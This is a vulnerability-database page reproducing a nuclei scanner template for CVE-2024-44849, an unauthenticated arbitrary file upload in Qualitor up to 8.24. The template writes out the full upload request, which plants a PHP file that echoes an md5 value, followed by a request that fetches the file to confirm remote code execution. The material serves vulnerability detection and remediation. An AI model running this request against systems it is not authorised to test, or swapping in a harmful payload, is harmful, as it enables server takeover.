Lucene search
K

Qualitor <= 8.24 - Remote Code Execution

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Qualitor <= 8.24 - Remote Code Execution via Arbitrary File Upload in checkAcesso.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-44849
9 Sep 202420:39
circl
CNNVD
Qualitor 安全漏洞
9 Sep 202400:00
cnnvd
CVE
CVE-2024-44849
9 Sep 202400:00
cve
Cvelist
CVE-2024-44849
9 Sep 202400:00
cvelist
NVD
CVE-2024-44849
9 Sep 202418:15
nvd
OSV
CVE-2024-44849
9 Sep 202418:15
osv
Positive Technologies
PT-2024-31278 · Qualitor · Qualitor
9 Sep 202400:00
ptsecurity
RedhatCVE
CVE-2024-44849
23 May 202508:26
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-44849
8 Oct 202400:00
vulncheck_kev
Vulnrichment
CVE-2024-44849
9 Sep 202400:00
vulnrichment
Rows per page
id: CVE-2024-44849

info:
  name: Qualitor <= 8.24 - Remote Code Execution
  author: s4e-io
  severity: critical
  description: |
    Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.
  impact: |
    Unauthenticated attackers can upload malicious files to achieve remote code execution on the Qualitor server.
  remediation: |
    Update Qualitor to version later than 8.24 that patches the arbitrary file upload vulnerability.
  reference:
    - https://cvefeed.io/vuln/detail/CVE-2024-44849
    - https://nvd.nist.gov/vuln/detail/CVE-2024-44849
    - https://github.com/extencil/CVE-2024-44849
    - https://blog.extencil.me/information-security/cves/cve-2024-44849
    - https://sploitus.com/exploit?id=D08D686E-7910-5E17-99CC-36407B9884B8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-44849
    cwe-id: CWE-434
    epss-score: 0.46301
    epss-percentile: 0.98667
  metadata:
    verified: true
    max-request: 2
    vendor: qualitor
    product: qualitor
    fofa-query: "Qualitor"
  tags: cve,cve2024,rce,file-upload,qualitor,intrusive,vkev,vuln

variables:
  filename: "{{rand_base(12)}}"
  num: "{{rand_int(1000, 9999)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849

        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="idtipo"

        2
        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="nmfilestorage"


        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="nmdiretoriorede"

        .
        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="nmbucket"


        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="nmaccesskey"


        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="nmkeyid"


        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="fleArquivo"; filename="{{filename}}.php"

        <?php echo md5({{num}}); ?>
        -----------------------------QUALITORspaceCVEspace2024space44849
        Content-Disposition: form-data; name="cdfilestorage"


        -----------------------------QUALITORspaceCVEspace2024space44849--

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "parent.showQAlert(\'Upload", "showQAlert")
          - status_code == 200
        condition: and
        internal: true

  - raw:
      - |
        GET /html/ad/adfilestorage/request/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"{{md5(num)}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502203f20a73119ffcbee152c606695a3ce314ea0911e624bc10b3c7628ae8cc349cc022100a4375af1957530a8ece9c1c014f231c5ea7aa1f51a1179b491946d8cc7a0cc61:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.46301
SSVC
17